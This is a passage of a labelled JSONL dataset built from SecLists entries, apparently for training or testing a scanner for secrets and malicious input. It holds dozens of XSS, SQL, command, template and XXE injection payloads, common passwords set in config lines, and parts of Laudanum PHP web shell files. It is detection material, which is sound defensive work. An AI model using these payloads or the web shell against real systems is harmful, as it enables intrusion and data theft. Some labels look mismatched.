"subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "abby"}}]} {"id": "seclists_00609", "source": "seclists", "source_license": "MIT", "text": "password: Cisco,<BLANK>,changeit,http://160.78.48.20/vpn/software/How_to_use_Webvpn_with_Citrix_Metaframe.pdf\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Cisco,<BLANK>,changeit,http://160.78.48.20/vpn/software/How_to_use_Webvpn_with_Citrix_Metaframe.pdf"}}]} {"id": "seclists_00610", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><map onkeypress=\"alert(1)\" contenteditable>test</map></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<map onkeypress=\"alert(1)\" contenteditable>test</map>", "injection_type": "XSS"}}]} {"id": "seclists_00611", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=x' AND email IS NULL; -- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' AND email IS NULL; --", "injection_type": "SQL"}}]} {"id": "seclists_00612", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:goldwing", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "goldwing"}}]} {"id": "seclists_00613", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=cindy1\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "cindy1"}}]} {"id": "seclists_00614", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${system(print(`echo%20CTDUTJ\\necho%20$((30%2B48))\\necho%20CTDUTJ\\necho%20CTDUTJ`)%3BCTDUTJ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${system(print(`echo%20CTDUTJ\\necho%20$((30%2B48))\\necho%20CTDUTJ\\necho%20CTDUTJ`)%3BCTDUTJ", "injection_type": "cmd"}}]} {"id": "seclists_00615", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or '1'='1'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or '1'='1'--", "injection_type": "SQL"}}]} {"id": "seclists_00616", "source": "seclists", "source_license": "MIT", "text": "filename={&apos;}", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "{&apos;}", "injection_type": "cmd"}}]} {"id": "seclists_00617", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=grendel\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "grendel"}}]} {"id": "seclists_00618", "source": "seclists", "source_license": "MIT", "text": "filename=' or 1 in (@@version)--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 1 in (@@version)--", "injection_type": "cmd"}}]} {"id": "seclists_00619", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.", "injection_type": "XSS"}}]} {"id": "seclists_00620", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1 waitfor delay '0:0:10'--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1 waitfor delay '0:0:10'--", "injection_type": "SQL"}}]} {"id": "seclists_00621", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector concatenates a string and evaluates it via self-execution.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector concatenates a string and evaluates it via self-execution.", "injection_type": "XSS"}}]} {"id": "seclists_00622", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %20echo%20EXSSVL$((23%2B38))$(echo%20EXSSVL)EXSSVL&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20EXSSVL$((23%2B38))$(echo%20EXSSVL)EXSSVL&", "injection_type": "cmd"}}]} {"id": "seclists_00623", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style id=x tabindex=1 onbeforeactivate=alert(1)></style> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style id=x tabindex=1 onbeforeactivate=alert(1)></style>", "injection_type": "XSS"}}]} {"id": "seclists_00624", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;echo%20UWAPJX$((78%2B84))$(echo%20UWAPJX)UWAPJX&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo%20UWAPJX$((78%2B84))$(echo%20UWAPJX)UWAPJX&", "injection_type": "cmd"}}]} {"id": "seclists_00625", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=pfSense,admin,pfsense,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pfSense,admin,pfsense,"}}]} {"id": "seclists_00626", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf |usr/bin/id\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|usr/bin/id\\n", "injection_type": "cmd"}}]} {"id": "seclists_00627", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<code ondblclick=\"alert(1)\">test</code>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<code ondblclick=\"alert(1)\">test</code>", "injection_type": "XSS"}}]} {"id": "seclists_00628", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:SAP,cemadmin,quality,https://redrays.io/cve-2020-6369-patch-bypass/@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "SAP,cemadmin,quality,https://redrays.io/cve-2020-6369-patch-bypass/"}}]} {"id": "seclists_00629", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf /etc/passwd", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_00630", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2A%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%7C", "injection_type": "cmd"}}]} {"id": "seclists_00631", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides shell access to the system. It is built based on the 2.1\n*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler\n*** <mgeisler[at]mgeisler.net>\n***\n*** Updated by Tim Medin\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n*** \n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n*** \n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n\ninclude 'ipcheck.php';\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Shell Access</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a\n href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\n// set_error_handler('wpl_error_handler');\n\n\nfunction logout() {\n $_SESSION = array('authenticated' => false);\n if (isset($_COOKIE[session_name()]))\n setcookie(session_name(), '', time()-42000, '/');\n session_destroy();\n}\n\n\nfunction wpl_stripslashes_deep($value) {\n if (is_array($value))\n return array_map('stripslashes_deep', $value);\n else\n return stripslashes($value);\n}\n\nif (get_magic_quotes_gpc())\n $_POST = stripslashes_deep($_POST);\n\n/* Initialize some variables we need again and again. */\n//$username = isset($_POST['username']) ? $_POST['username'] : '';\n//$password = isset($_POST['password']) ? $_POST['password'] : '';\n//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';\n\n$command = isset($_POST['command']) ? $_POST['command'] : '';\n$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;\n$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;\n\n\n///* Default settings --- these settings should always be set to something. */\n//$default_settings = array('home-directory' => '.');\n\n///* Merge settings. */\n//$ini['settings'] = array_merge($default_settings, $ini['settings']);\n\n\nsession", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "shell.php"}}]} {"id": "seclists_00632", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Netgear,admin,1234,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Netgear,admin,1234,"}}]} {"id": "seclists_00633", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<time onkeyup=\"alert(1)\" contenteditable>test</time> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<time onkeyup=\"alert(1)\" contenteditable>test</time>", "injection_type": "XSS"}}]} {"id": "seclists_00634", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_00635", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {color: red;}</style><noembed id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></noembed>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><noembed id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></noembed>", "injection_type": "XSS"}}]} {"id": "seclists_00636", "source": "seclists", "source_license": "MIT", "text": "filename=echo%20UBUDSE$((16%2B26))$(echo%20UBUDSE)UBUDSE//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo%20UBUDSE$((16%2B26))$(echo%20UBUDSE)UBUDSE//", "injection_type": "cmd"}}]} {"id": "seclists_00637", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello execInfo.templateStack</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "execInfo.templateStack", "injection_type": "SSTI"}}]} {"id": "seclists_00638", "source": "seclists", "source_license": "MIT", "text": "filename=response.write 111111", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "response.write 111111", "injection_type": "cmd"}}]} {"id": "seclists_00639", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ..%%35%63", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%%35%63", "injection_type": "cmd"}}]} {"id": "seclists_00640", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00641", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, name contained, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, name contained, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_00642", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=or 1=1-- HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1--", "injection_type": "cmd"}}]} {"id": "seclists_00643", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{}</style><legend style=\"animation-name:x\" onanimationend=\"alert(1)\"></legend> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><legend style=\"animation-name:x\" onanimationend=\"alert(1)\"></legend>", "injection_type": "XSS"}}]} {"id": "seclists_00644", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Evade Regex Filter 5 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Evade Regex Filter 5", "injection_type": "XSS"}}]} {"id": "seclists_00645", "source": "seclists", "source_license": "MIT", "text": "filename=&#x00003C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x00003C;", "injection_type": "cmd"}}]} {"id": "seclists_00646", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><link rel=import href=\"data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<link rel=import href=\"data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;", "injection_type": "XSS"}}]} {"id": "seclists_00647", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_00648", "source": "seclists", "source_license": "MIT", "text": "filename=|echo$IFSUZPDRC$((26%2B91))$(echo$IFSUZPDRC)UZPDRC%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSUZPDRC$((26%2B91))$(echo$IFSUZPDRC)UZPDRC%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_00649", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf PRINT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "PRINT", "injection_type": "cmd"}}]} {"id": "seclists_00650", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>", "injection_type": "cmd"}}]} {"id": "seclists_00651", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00652", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Noscript-breaker with mouseover\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Noscript-breaker with mouseover", "injection_type": "XSS"}}]} {"id": "seclists_00653", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<details onpaste=\"alert(1)\" contenteditable>test</details> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<details onpaste=\"alert(1)\" contenteditable>test</details>", "injection_type": "XSS"}}]} {"id": "seclists_00654", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%26echo%20TGSMRI$((56%2B34))$(echo%20TGSMRI)TGSMRI%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26echo%20TGSMRI$((56%2B34))$(echo%20TGSMRI)TGSMRI%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00655", "source": "seclists", "source_license": "MIT", "text": "username=PRINT @@variable&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "PRINT @@variable", "injection_type": "SQL"}}]} {"id": "seclists_00656", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file attempts to kill all netcat processes spawned by the current user.\n*** This may be useful in cases where a reverse shell attempt has gone wrong. \n***\n*** Written by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n*** \n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n*** \n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n\ninclude 'ipcheck.php';\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Hostname by IP Lookup</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum Kill nc</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n</head>\n<body>\n\n<h1>Kill nc 0.1</h1>\n\n<?php echo exec('killall nc');?>\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "killnc.php"}}]} {"id": "seclists_00657", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\" or \"\"*\"';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"\"*\"", "injection_type": "SQL"}}]} {"id": "seclists_00658", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00659", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello constant('Twig_Environment::VERSION_ID')</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "constant('Twig_Environment::VERSION_ID')", "injection_type": "SSTI"}}]} {"id": "seclists_00660", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<th ondblclick=\"alert(1)\">test</th>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<th ondblclick=\"alert(1)\">test</th>", "injection_type": "XSS"}}]} {"id": "seclists_00661", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=.current_template_name HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": ".current_template_name", "injection_type": "SSTI"}}]} {"id": "seclists_00662", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\00\\00\\00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\00\\00\\00", "injection_type": "cmd"}}]} {"id": "seclists_00663", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<xml ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xml ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>", "injection_type": "XXE"}}]} {"id": "seclists_00664", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \"&\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"&\"", "injection_type": "SQL"}}]} {"id": "seclists_00665", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><IMG SRC=\"jav&#x0D;ascript:alert(<WBR>'XSS');\"></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"jav&#x0D;ascript:alert(<WBR>'XSS');\">", "injection_type": "XSS"}}]} {"id": "seclists_00666", "source": "seclists", "source_license": "MIT", "text": "filename=xsstest", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "xsstest", "injection_type": "cmd"}}]} {"id": "seclists_00667", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <youremail>%0aCc:<youremail>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<youremail>%0aCc:<youremail>", "injection_type": "cmd"}}]} {"id": "seclists_00668", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=toby\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "toby"}}]} {"id": "seclists_00669", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\" or \"1\"=\"1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or \"1\"=\"1", "injection_type": "SQL"}}]} {"id": "seclists_00670", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:badboy1", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "badboy1"}}]} {"id": "seclists_00671", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=..%u2215 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%u2215", "injection_type": "cmd"}}]} {"id": "seclists_00672", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>:target {transform: rotate(180deg);}</style><html id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></html> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><html id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></html>", "injection_type": "XSS"}}]} {"id": "seclists_00673", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: %2A%28%7C%28objectclass%3D%2A%29%29", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%28%7C%28objectclass%3D%2A%29%29", "injection_type": "LDAP"}}]} {"id": "seclists_00674", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>a(0)</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a(0)", "injection_type": 